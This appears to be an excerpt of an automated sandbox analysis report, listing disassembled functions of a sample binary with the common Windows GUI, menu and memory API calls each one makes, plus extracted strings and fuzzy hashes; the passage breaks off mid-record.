Opcode Fuzzy Hash: c8dc1bbd9dfff6281a83cb0f538fc06758efbd5d1fbdef0e4697c2d27f0916d4
Instruction Fuzzy Hash: 696157B0806B458FC765DF7A85897DAFBE8BFA5300F104A1F90AE82261DBB42145CF15

Function 004EAEBD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 004EAF0B
SetActiveWindow.USER32(?), ref: 004EAF1D
SendMessageW.USER32(?,00000112,?,?), ref: 004EAF33
IsWindow.USER32(?), ref: 004EAF40
SetActiveWindow.USER32(?), ref: 004EAF47
IsWindow.USER32(?), ref: 004EAF4C
SetFocus.USER32(?), ref: 004EAF56

Strings

u, xrefs: 004EAF5E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 7d17bc1615602abd86a205c9a36d19b2e09da18f6e9b6ad75c67465810cc291e
Instruction ID: b53e1cd15c8c0d18d10f6a7de1f3ef1c3538cc2bf9dd1712a521ad7a63d42213
Opcode Fuzzy Hash: 7d17bc1615602abd86a205c9a36d19b2e09da18f6e9b6ad75c67465810cc291e
Instruction Fuzzy Hash: D91103B2910284BBCB246B3BCC08A7B7A64EF44302B040026F905D6264CA3CFD20DA9A

Function 005B2C2F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 005B2C57
GetStockObject.GDI32(0000000D), ref: 005B2C5F
GetObjectW.GDI32(00000000,0000005C,?), ref: 005B2C6C
GetDC.USER32(00000000), ref: 005B2C7B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005B2C8F
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 005B2C9B
ReleaseDC.USER32(00000000,00000000), ref: 005B2CA7

Strings

System, xrefs: 005B2C52, 005B2CBC

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: e6f684c84217e1014be8a43176a2d9c140012297d332f2cc08981de04b92be06
Instruction ID: 59f2b32e4242ac3d39e15db40c3337096d9bfca432d2ac6a2c843438aa5177fa
Opcode Fuzzy Hash: e6f684c84217e1014be8a43176a2d9c140012297d332f2cc08981de04b92be06
Instruction Fuzzy Hash: F9115B71A40318AADB10ABA1DC49FBE7FA9FB55741F040119F605EB180DA74AD05DB60

Function 004F0CBE Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004F0CC8
GetWindowRect.USER32(?,?), ref: 004F0D17
OffsetRect.USER32(?,?,?), ref: 004F0D2D

Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5

CreateCompatibleDC.GDI32(?), ref: 004F0D9E
SelectObject.GDI32(?,?), ref: 004F0DBE
SelectObject.GDI32(?,?), ref: 004F0E00
CreateCompatibleDC.GDI32(?), ref: 004F0F19
SelectObject.GDI32(?,?), ref: 004F0F39
SelectObject.GDI32(?,00000000), ref: 004F0F69

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateRect$H_prolog3H_prolog3_OffsetWindow
String ID:
API String ID: 2818906880-0
Opcode ID: c119e07366c9270c006bd94e23ec4308d55bf5cd5329f07eaa133f38df246981
Instruction ID: 9821f2e53de45a656e7fc914a5c47002f31a9437af84a87d676e3ab8ddb68382
Opcode Fuzzy Hash: c119e07366c9270c006bd94e23ec4308d55bf5cd5329f07eaa133f38df246981
Instruction Fuzzy Hash: 73A11471D0021EDFCF20EFA5C984AEEBBB5BF48304F1441AAE905B7252DA745A45CFA4

Function 004DA974 Relevance: 13.7, APIs: 9, Instructions: 233filecomstringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004DA97B
OleDuplicateData.OLE32(?,?,00000000), ref: 004DA9FC
GlobalLock.KERNEL32(00000000), ref: 004DAA2B
CopyMetaFileW.GDI32(?,00000000), ref: 004DAA37
GlobalUnlock.KERNEL32(?), ref: 004DAA47
GlobalFree.KERNEL32(?), ref: 004DAA50
GlobalUnlock.KERNEL32(?), ref: 004DAA5C
lstrlenW.KERNEL32(?,0000005C,005B2FF2,?,?,?), ref: 004DAABC
CopyFileW.KERNEL32(?,?,00000000,?,?,0000005C,005B2FF2,?,?,?), ref: 004DABB4

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3_LockMetalstrlen
String ID:
API String ID: 3489744035-0
Opcode ID: 5d42fb2d0deb2623b46507369726ab635a7929b35c89f51bcbc06ce90cf6dba1
Instruction ID: f3810ff645bf1ac40d08b984991b32be93e39c169bdebf15bfd8e33ddded3e80
Opcode Fuzzy Hash: 5d42fb2d0deb2623b46507369726ab635a7929b35c89f51bcbc06ce90cf6dba1
Instruction Fuzzy Hash: 28816BB1A00506AFDB149FA4CD9893ABBB9FF44304710851BE4569B750D738EC21DB66

Function 004EF1E7 Relevance: 13.7, APIs: 9, Instructions: 168windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0051B291: GetParent.USER32(?), ref: 0051B29D
Part of subcall function 0051B291: GetParent.USER32(00000000), ref: 0051B2A0

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetParent.USER32(?), ref: 004EF248
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 004EF25D
GetClientRect.USER32(?,?), ref: 004EF2C4
GetClientRect.USER32(?,?), ref: 004EF2D9

Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E016D
Part of subcall function 004E015C: ClientToScreen.USER32(?,?), ref: 004E017A

GetWindowRect.USER32(?,?), ref: 004EF2F9

Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F

GetParent.USER32(?), ref: 004EF348
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004EF35C
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 004EF3B1
PostMessageW.USER32(?,00000000,00000000), ref: 004EF3D3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientMessageParent$RectSendWindow$Screen$LongPost
String ID:
API String ID: 3884207962-0
Opcode ID: afc467c3abc5099a5d2095644e5294c0dd27cb9252c69ca2fe1b88b6427dd3ab
Instruction ID: 04c8b73a440fef7f71ea099b3c5c5799307b50918d3305b68e54ad07a7783df9
Opcode Fuzzy Hash: afc467c3abc5099a5d2095644e5294c0dd27cb9252c69ca2fe1b88b6427dd3ab
Instruction Fuzzy Hash: BC6109B1D00209AFCF10DFA9DC84AAEBBB5FF88304F11456AE905EB265CB759905CF64

Function 00540AB1 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00540AB8
CreatePopupMenu.USER32 ref: 00540AEF
AppendMenuW.USER32(?,00000040,?,?), ref: 00540B8E
GetLastError.KERNEL32 ref: 00540B98
AppendMenuW.USER32(?,00000040,?,?), ref: 00540C0A
GetLastError.KERNEL32 ref: 00540C12
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00540C33
GetLastError.KERNEL32 ref: 00540C3B
SetMenuDefaultItem.USER32(00000000,000000FF,00000000), ref: 00540C78

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$AppendErrorLast$CreateDefaultH_prolog3ItemPopup
String ID:
API String ID: 1085244643-0
Opcode ID: b600293d10a53e5dc2b6312552c19ee4f76a10aef2058f0c53a62c41bbf48f5a
Instruction ID: 2af6281185e0b82910a30d2c0a7de718002a3fb53b9b89e1296e2387b5f55857
Opcode Fuzzy Hash: b600293d10a53e5dc2b6312552c19ee4f76a10aef2058f0c53a62c41bbf48f5a
Instruction Fuzzy Hash: EA519331900616CFDB24DBA9CC89AFEBAB1FF44318F24062DE655A72D0DB349D41DB58

Function 005177A2 Relevance: 13.6, APIs: 9, Instructions: 150windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1116: GetFocus.USER32 ref: 004E111C
Part of subcall function 004E1116: GetParent.USER32(00000000), ref: 004E1144
Part of subcall function 004E1116: GetWindowLongW.USER32(?,000000F0), ref: 004E115F
Part of subcall function 004E1116: GetParent.USER32(?), ref: 004E116D
Part of subcall function 004E1116: GetDesktopWindow.USER32 ref: 004E1171
Part of subcall function 004E1116: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004E1185

GetMenu.USER32(?), ref: 0051781C
GetMenuItemCount.USER32(?), ref: 0051784C
GetSubMenu.USER32(?,00000000), ref: 0051785D
GetMenuItemCount.USER32(?), ref: 0051787F
GetMenuItemID.USER32(?,00000000), ref: 005178A0
GetSubMenu.USER32(?,00000000), ref: 005178B8
GetMenuItemID.USER32(?,00000000), ref: 005178D0
GetMenuItemCount.USER32(?), ref: 00517907
GetMenuItemID.USER32(?,00000000), ref: 00517922

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 7b5614c2b09a5014b8c8c97e50b46beadf619cc7acf9dbfe08cff8f2ade87341
Instruction ID: 82b48cf31a43a19b4f8c70230b0d2854d56041739e20921bfe1777bc5cb5b279
Opcode Fuzzy Hash: 7b5614c2b09a5014b8c8c97e50b46beadf619cc7acf9dbfe08cff8f2ade87341
Instruction Fuzzy Hash: 0D518C30904209AFEF11AF69C988AEEBFB5FF5C310F20446AE416E6121D735DD84DB60

Function 004E14E2 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004E14E9
EnterCriticalSection.KERNEL32(?,00000010,004E16B2,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E14FA
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1518
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E154C
LeaveCriticalSection.KERNEL32(004D106C,?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E15B8
_memset.LIBCMT ref: 004E15D7
TlsSetValue.KERNEL32(?,00000000), ref: 004E15E8
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,004DF886,004DAD1B,004DA2E2,?,?,004D106C,00000000), ref: 004E1609

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 8e61d20f6362b9594d299519405e4427a5e28b422baf24016923124a5883a1ff
Instruction ID: f8e07226bf584878064176f1df08fdc3523405919b05e14811e623bc0cebccb0
Opcode Fuzzy Hash: 8e61d20f6362b9594d299519405e4427a5e28b422baf24016923124a5883a1ff
Instruction Fuzzy Hash: 5E316A70540646AFCB20AF62DC85C7ABBA5FF44312B20892EF51696670CB38A954DB89

Function 00545049 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 472COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00545053
GetObjectW.GDI32(?,00000018,?), ref: 00545106
DeleteObject.GDI32(?), ref: 005451D2
_memset.LIBCMT ref: 005453B5
_memset.LIBCMT ref: 00545411
DeleteObject.GDI32(?), ref: 005455C9

Strings

TR`, xrefs: 00545361, 0054557E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Delete_memset$H_prolog3
String ID: TR`
API String ID: 1235337548-1372258800
Opcode ID: 1aff86bf8042669a57cec6130dae14386e2bf46c29f7bd41fb61c6ad0da164fe
Instruction ID: ad52eb9f489b68796e52969d9ab59ae64fce6abac4988ec3f5a153e30b7574c6
Opcode Fuzzy Hash: 1aff86bf8042669a57cec6130dae14386e2bf46c29f7bd41fb61c6ad0da164fe
Instruction Fuzzy Hash: EA2216B0D00629DFCF25DFA4C9856EDBBB5FF08704F10809AE459AB252EB305A95CF90

Function 005273E0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 369windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005273E7
GetWindow.USER32(?,00000005), ref: 00527407
GetWindow.USER32(?,00000002), ref: 0052743D
IsWindowVisible.USER32(?), ref: 00527521
GetWindow.USER32(?,00000002), ref: 005277B1

Strings

83`, xrefs: 005274E7, 005277F6
c, xrefs: 00527788

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3Visible
String ID: 83`$c
API String ID: 3969123015-1750629417
Opcode ID: 86298384300dcf2b8c186124015ce035b405f8a3b436d52c4a4c251c48e7bcc2
Instruction ID: 6441740fb1534824352c50ab535059fe4cb7d20b6a28b887171e798151e14a05
Opcode Fuzzy Hash: 86298384300dcf2b8c186124015ce035b405f8a3b436d52c4a4c251c48e7bcc2
Instruction Fuzzy Hash: 98D19F30A0462A9FCF15EF65D899ABEBBF5BF49300F180569E806AB2D1DF349D40CB51

Function 0053B89B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 0053B912

Strings

X`, xrefs: 0053BA88
c, xrefs: 0053B8DD

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectWindow
String ID: X`$c
API String ID: 861336768-3275090540
Opcode ID: e1a583a593bbfab4cc3d553ccd699eae3a502bed97de265b9d70fc5a7c9213ce
Instruction ID: d76f09d916217d82ce79797c220b12cc411a5de4cf9aac03e1f3b32e1ebe0a32
Opcode Fuzzy Hash: e1a583a593bbfab4cc3d553ccd699eae3a502bed97de265b9d70fc5a7c9213ce
Instruction Fuzzy Hash: 4B616C71600605AFDB15AF64C899EBEBBF9FF48300F10046EF646D7291DB359A41CBA0

Function 004F8953 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

83`, xrefs: 004F8A93

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: 83`
API String ID: 0-1826646354
Opcode ID: 4ef5e28b26c7cd01a39a6a1e4a6d061517c07e718a87d73fc26c70d61e7e642b
Instruction ID: 8512e8f577200fd97a7a1ae70ba41a8713506ed0d458194b9e2cb0de5617926b
Opcode Fuzzy Hash: 4ef5e28b26c7cd01a39a6a1e4a6d061517c07e718a87d73fc26c70d61e7e642b
Instruction Fuzzy Hash: 03517971700604AFCB259F65C898F7A76A9EF48704F11056EFA4A9B2A1DF78ED00CB58

Function 004FC099 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004FC112
SendMessageW.USER32(00000000,0000040C,00000000,00000000), ref: 004FC151
SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 004FC180
SetRectEmpty.USER32(?), ref: 004FC1DA
SendMessageW.USER32(00000000,0000040B,00000000,?), ref: 004FC240
RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 004FC266

Strings

To`, xrefs: 004FC11F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$EmptyParentRectRedrawWindow
String ID: To`
API String ID: 3879113052-992168270
Opcode ID: ec3fa4903c864e2146181ff3540979627ba5584a98f68e2ab833492ff05df548
Instruction ID: 27129566040dcbb65e5ccb0839903128ad171492afaac5f687d440fa5f166748
Opcode Fuzzy Hash: ec3fa4903c864e2146181ff3540979627ba5584a98f68e2ab833492ff05df548
Instruction Fuzzy Hash: EB512971A0021D9FDB20DFA8C984BAEBBF5FF48704F21416AE645E7291DB349940CF44

Function 0053CEFB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 0053CFB4
PtInRect.USER32(?,?,?), ref: 0053CFC8
GetWindowRect.USER32(?,?), ref: 0053CFE7
PtInRect.USER32(?,?,?), ref: 0053D01E
InflateRect.USER32(?,?,?), ref: 0053D030
PtInRect.USER32(?,?,?), ref: 0053D040

Part of subcall function 00508707: __EH_prolog3.LIBCMT ref: 0050870E

Strings

c, xrefs: 0053CF27

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$H_prolog3InflateWindow
String ID: c
API String ID: 1292614506-2927717585
Opcode ID: 734ffda51caf93221d694baa25624427288cc2422f834eaa949c194020995c69
Instruction ID: 59d1d063fdd9c1aa0c661de544d8c75d8d16194b03bdfe1e8feb5fead216f5d7
Opcode Fuzzy Hash: 734ffda51caf93221d694baa25624427288cc2422f834eaa949c194020995c69
